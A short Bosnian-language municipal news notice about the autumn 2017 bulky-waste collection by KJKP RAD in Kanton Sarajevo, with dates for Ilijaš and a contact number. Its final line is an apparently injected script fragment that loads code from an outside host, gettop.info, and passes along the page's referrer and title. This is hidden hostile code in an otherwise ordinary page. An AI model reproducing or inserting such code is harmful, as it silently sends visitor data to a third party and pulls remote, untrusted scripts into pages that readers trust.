Ovog vikenda jesenja akcija odvoza kabastog otpada u Ilijašu

Na području Kantona Sarajevo ove godine KJKP RAD  proveo je  proljetnu i ljetnu akciju odvoza kabastog otpada. Početkom mjeseca oktobra počela je jesenja akcija odvoza kabastog otpada i trajat će do 29.10.2017. godine. Stanovnici će odlagati svoj kabasti otpad u danima vikenda na poznate lokacije iz ranijih akcija, a KJKP RAD d.o.o. Sarajevo će u narednoj radnoj sedmici organizovati ljudstvo i mehanizaciju kako bi se odvukao i adekvatno zbrinuo kabasti otpad.

Kako bi izbjegli nemile prizore u svojim naseljima mole se stanovnici Kantona Sarajevo da poštuju termine odvoza kabastog otpada prema rasporedu koji je određen za Općine u kojima stanuju.

Akcija u Ilijašu planirana je za vikend-14. i 15. 10. 2017. godine.

Mole se  građani  da se pridržavaju termina odvoza, a ukoliko imaju potrebu da prije početka ili poslije završetka jedne od akcija odvoza kabastog otpada odlože svoj kabasti otpad da pozovu broj telefona 033/641-051 i dobit će sve potrebne informacije, obavještavaju iz KJKP RAD d.o.o. Sarajevo.

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;